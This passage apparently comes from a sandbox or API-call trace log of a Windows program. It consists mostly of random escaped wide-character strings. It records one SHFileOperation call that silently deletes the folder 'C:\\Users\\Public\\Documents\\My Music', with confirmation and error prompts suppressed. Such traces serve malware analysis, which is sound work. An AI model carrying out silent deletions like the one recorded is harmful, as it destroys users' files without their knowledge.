xb947\xb241\xdb2d\xf2e4\x237f\xb6a7\xa2b5\xcd7d\x5ba1\x306c\x2b0d\x6dd0\x5d05\xd056\x573\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x9d45\xb7eb\x4236\x3154\x7544\x59e2\x2049\x8db7\xbbd\x3422\xcf0f\xb93f\x1e82\x7810\x1054\xefe3\x1195\xbba3\xe051\xe34e\x78ed\x5aac\x96ac\x23c4\x9d4b\x9f66\xbf40\x9448\xb3df\x861b\xcc74\x78e7\x1135\x5def\x69a7\x5aed\xf38b\x5166\xed2a\x6e32\xbc96\x45e5\xa52d\xad12\xef61\xa0e0\xf142\xbeb3\x8980\xf9a3\xd036\xef77\x2590\xef9a\xda08\xdca7\x9381\x2064\x83d2\x3228\xa315\x820f\x505e\x8af5\xe269\x637a\xb29c\x4caf\xd583\xd948\x9de8\xb292\xd40\x9056\x200d\x987e\xc2db\xd09f\x883\x3f2f\xdc85\xe569\x9005\x9d64\x7077\x84fa\xaaa\xef39\x9e49\x63e0\x4ef4\x372f\x3311\xe57\x4524\xeb2d\x62a\x723\x14c2\x4f85\x8a41\xf086\xb047\xaf02\x2f1f\xb04b\x77be\xb52a\xd9b2\xbd88\x5d4b\x3105\x77a2\x3e33\xdec3\xbb0d\x3c7f\xdd76\xcd0a\x247f\xe20c\xa644\x6dd1\x2e06\x2181\x7b19\x263d\x48fc\x3ee7\x191a\x9690\xfa7d\x546d\x8f2\xb3db\xa261\x554d\x5cb8\x1dc4\xc202\xd873\xc5b3\x569a\x9117\xee7f\xbb73\xfce2\x2130\xfdad\xd9d7\xfe11\xddc6\xdfdd\x4767\xa24e\x8882\x12d3\xc548\x6eca\x653e\x1d9a\xb5e\xcc4e\x23a8\x3130\x4bf4\xab75\xe4d8\x9edb\xa39b\xa054\x9b2b\xfd6a\xc40a\x2cdf\x7e3\xc97b\xd0d1\xe923\x5816\x3d7b\xca0d\x9c5a\x6554\x8b63\x5699\x8afc\x9160\x5936\x4658\x685d\x2d15\x448d\x38a\x53da\x71d2\x4eb\x9787\x7fbd\xf01d\xe5a1\xedc0\x85ff\xe4f3\x85cd\x5591\xfed6\x6229\xbd54\x2f24\x7747\xa25f\xe6e7\x94e5\x7ac8\xf2b6\xc3e6\x7032\x8b54\xd3d7\x74b0\xee18\x900e\x7e50\x13a\x3db9\x5bb3\xa50d\x58dc\xb0e6\xadf9\xfe0d\x96cc\x77c0\x6fc8\x72f2\x4c6\x6980\xfe5\x74d9\xdd06\x1c5e\x288e\x4e90\x95b1\xbc77\x2b02\x4829\x1d76\xdd36\x7465\x82a4\xddde\xdba4\xad09\x8f0f\x3180\xdd5a\xa304\x183c\xc1ef\x17c2\x64c0\x1dfb\x92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae") | out: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\Public\\Documents\\My Music", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\xb2b4\xab1d\xce0f\xf32c\xfed3\x3518\x1497\x3255\x9b\x42f\x2770\x1236\x8bde\x6231\xf299\xa566\xc764\xd08\x3270\xabe8\xd3f2\x7909\x74a8\x967\x8f6f\xaf90\xf915\xae08\xa4ac\xb7c1\x65de\xf5ff\xd060\x1ba3\xdfb0\xec21\xc92d\xc9de\x615e\x1a38\x71db\xe234\x7cf9\x590f\xe21d\x7ea4\xb71c\xaaa\xb5d9\x7197\x824a\x5f09\x638f\x2ece\xe1e1\x3959\x3a11\x362\x3c05\x4bc7\x9c2d\x6bad\x59b4\x72b3\x403c\xb346\x8b9b\xa8e2\x6037\x34f3\x22a1\x3034\xa279\xaac0\x5908\xa09\xc98a\x2146\xeffb\x7266\xfce1\xc993\x5c\xee7d\x9436\xed71\xb319\x9430\x795a\xd71b\x1f9c\x9113\x4473\xb3e4\xb222\x445c\xe6ee\xf691\x22e5\x2354\x594a\x4229\xcc5f\xa1e4\x22a5\x4e34\x1e84\xa114\x2281\xa2df\xb8db\x6057\xef54\xdbbd\xb081\x1f89\x5249\xeabd\xadc4\x21d\x513\xf6d8\xa91f\x9bb7\x2426\xf8ba\x4923\xb024\xa488\xac2a\xb5db\x3871\x291f\xd4eb\x5287\xe1c4\x9313\xa1b1\xbbd\x482\x3e87\x7b14\x1f48\x514a\x347d\xbf42\x6d11\xbf51\x6d98\x7743\xd5ea\x494e\x8587\x16ef\x2a07\x3311\x7d90\xdbc0\xc724\xceb9\xbd82\x3b6c\x3fcb\xb38c\x3ced\xc52c\x76d9\x1cf6\x8f3b\x76d\x9165\x6719\xbc09\x1e88\x774\x2c7a\xe82e\x2cc2\x4dd\x6e45\x1b8b\x3d9b\x41d1\x5eb8\xba13\xe645\x909e\x6c8d\x8c1a\xfd72\xa744\xb67c\x47a7\x5c74\x1eca\x3742\x438b\x1f7a\xfd42\x660e\x2ee3\x4512\xa90e\xdf3e\x9319\x8db7\xf887\xb5c8\x207e\xdba1\xeaa5\x8ba8\x9e3\xda66\xedc9\xa1a0\x8171\x3ed9\x751\xdf09\x5337\xf668\x9076\x8de3\x63f1\x4a20\x240a\x4f1\x32ec\x6d00\x63ea\x8493\xa119\x2ea3\x6fb2\x3b85\xb8b2\xbb19\x1069\xfa26\xeffc\x375c\xdc4b\x4e84\xbb7d\x346\xe2a\x7f\xbd8a\x536\xe58b\x6d18\x284f\x9446\x2ae1\xd6e\x8c0c\xe9fd\xd007\x62dc\xeaff\x8e01\x7388\xf1b9\x3905\xd079\xf3e\x1aa2\xd7ec\xc43\xdb56\xbf60\xb166\x2950\xec1b\x4437\xaade\xb951\x8b24\x106a\xafe7\x9cc5\x360d\xd2d9\x9e2b\xfea6\x3a69\xac16\x5cd9\x48d1\xcd18\xdfd4\x2344\xe321\xc3ae\x70d0\xca86\xb1ad\xa73d\xfcee\x78fe\x5b20\x4281\x2a6a\x832f\xfce\x2d59\x15bc\xa7b3\xb447\x7a7f\x1e98\xd2f2\xe56d\x2cdf\xe7d6\xe7df\x3ba5\xba54\x2d4f\xbcef\xf177\x7f7c\xd7f9\xe693\xe2f\xe650\xae4d\x4d0b\xbd92\xdbc9\xe554\x6dc9\xf96a\x6a37\x5f40\x96a8\x9f1f\x58bf\xd7bf\x7c97\xfca8\x9178\xe05a\x26f5\xca1f\x9e53\xcfac\x526e\xf65e\x7962\xd08d\x1b0c\x92b0\x1f14\xd408\xd337\xf2d6\x3a4f\x346f\xf295\x3553\xb209\x67a4\x9f96\x9b9a\x9160\x91f4\xa7e5\xf18a\xb439\xdb7c\x9386\x83df\xe5da\xea5a\x9b26\x5db0\x897c\xfe55\xa7b0\x8074\xda97\x2fef\x4191\x6986\xbd94\xfb41\xf03d\x4e1a\xb884\xe15b\xf25\xf644\x6aa1\xc7f9\xd292\xa8a9\x27e5\x6525\xb4ae\x1922\xda12\x6120\xc02e\x51ab\xf067\x15b0\xb023\xf455\xd074\xc6e6\xc6f9\x2946\x3f9b\x53ed\x498a\x902d\x2fb4\xf16\x331\xb4a\xec1b\xb4ea\xe8\xe079\xf0d\x2029\x6868\x58e9\x5c7c\x7a58\x8365\x387d\x5bc4\x8a79\xf0c1\xde86\x79f7\xd5d\x7d2e\x8340\xedd\x3b61\x9887\x6553\x4ae9\x7049\x173b\x124a\x8819\x59ff\x8adc\x4e5\x44ba\x2c9b\x42c8\xd983\x406e\x6d5\x2069\x1f62\x1f45\x7437\xc1be\x5305\xf743\xd